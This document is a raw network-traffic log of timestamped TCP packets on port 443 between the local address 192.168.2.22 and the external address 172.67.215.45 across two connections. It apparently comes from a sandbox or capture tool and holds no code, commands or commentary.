Apr 24, 2024 10:24:11.817404032 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.817409992 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.817433119 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.818331957 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.818353891 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.818380117 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.818388939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.818407059 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.818509102 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.819273949 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.819293976 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.819344044 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.819354057 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.819366932 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.820152044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.820175886 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.820207119 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.820215940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.820229053 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.821346998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.821365118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.821388960 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.821397066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.821410894 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.821410894 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.822038889 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.822061062 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.822086096 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.822094917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.822108984 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.822882891 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.822901011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.822933912 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.822942972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.822958946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.823966980 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.823988914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.824021101 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.824031115 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.824048996 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.824881077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.824899912 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.824929953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.824939013 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.824954033 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.825002909 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.826046944 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.826066971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.826096058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.826105118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.826127052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.826586962 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.826610088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.826631069 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.826637030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.826653004 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.827584982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.827601910 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.827617884 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.827630043 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.827649117 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.829715967 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.829740047 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.829766035 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.829776049 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.829787016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.829788923 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.829818964 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.829824924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.829862118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:11.829894066 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.832828999 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:11.835635900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:12.509628057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:12.509671926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:12.509746075 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:12.510129929 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:12.510148048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:12.837236881 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:12.841171026 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:12.841198921 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.208004951 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.208055019 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.208332062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.208352089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.208580017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.208646059 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.208652973 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.209007978 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.209067106 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.209074020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.209331036 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.209351063 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.209383965 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.209391117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.209433079 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.210016012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.210212946 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.210266113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.210273027 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.210534096 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.210585117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.210592031 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.210747004 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.210824013 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.210829973 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.211430073 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.211452961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.211482048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.211489916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.211539984 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.211651087 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212260962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212287903 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212312937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212312937 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.212325096 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212366104 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.212373018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212398052 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212425947 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212464094 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212475061 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.212482929 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212553024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212565899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.212573051 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.212613106 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.213002920 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.213174105 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.213226080 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.213232994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.213819027 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.213871002 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.213877916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.213951111 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.213994026 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.214000940 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.214922905 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.214975119 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.214981079 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.220923901 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.220985889 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.220995903 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.368514061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.368596077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.368619919 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.368953943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.368967056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.369015932 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.369024038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.369105101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.369160891 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.369168043 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.370539904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.370594978 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.370604038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.370904922 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.370959044 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.370965958 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.372725010 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.372780085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.372786045 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.373409986 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.373457909 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.373462915 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.373482943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.373528957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.373534918 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.373775959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.373827934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.373836040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.377841949 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.377895117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.377902031 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.378243923 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.378297091 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.378304005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.378917933 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.378984928 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.379004955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.379090071 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.379146099 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.379153967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.380912066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.380961895 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.380970001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.382783890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.382839918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.382848024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.428184032 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.428231001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.428246975 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.428271055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.428284883 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.528620005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.528697014 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.528723955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.529081106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.529125929 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.529133081 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.536380053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.536433935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.536442995 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.536844969 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.536897898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.536904097 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.537936926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.537986040 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.537992001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.538496971 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.538546085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.538552046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539001942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539045095 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.539051056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539072037 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539108992 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.539114952 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539510012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539555073 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.539561033 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539817095 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.539861917 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.539868116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.541501045 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.541544914 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.541552067 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.542037964 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.542085886 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.542092085 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.542293072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.542337894 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.542344093 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.542741060 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.542788029 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.542793989 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.544936895 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.544991016 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.544997931 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.545372009 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.545422077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.545428038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.545500994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.545541048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.545547009 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.546806097 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.546860933 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.546865940 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.547250032 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.547293901 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.547301054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.547986984 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.548038960 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.548044920 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.548724890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.548778057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.548784018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.551178932 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.551229954 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.551234961 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.551249981 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.551285982 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.552536011 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.552567005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.552593946 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.552599907 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.552611113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.554385900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.554419041 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.554442883 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.554447889 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.554466009 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.561902046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.561930895 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.561966896 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.561974049 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.561984062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.564330101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.564361095 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.564388037 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.564393997 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.564404011 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.566456079 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.566483021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.566513062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.566519976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.566544056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.568084955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.568124056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.568144083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.568150997 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.568173885 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.568206072 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.588891029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.588927031 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.588953972 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.588985920 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.588999987 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.591636896 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.591665983 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.591692924 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.591700077 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.591711044 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.708051920 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.708082914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.708118916 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.708138943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.708148956 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.708180904 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.716741085 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.716749907 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.716775894 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.716784000 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.716806889 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.716816902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.716829062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.729928017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.729967117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.729981899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.729993105 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.730001926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.730017900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.730042934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.733028889 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.733059883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.733071089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.733082056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.733089924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.733107090 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.733130932 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.736592054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.736613035 CEST	443	49164	172.67.215.45	192.168.2.22
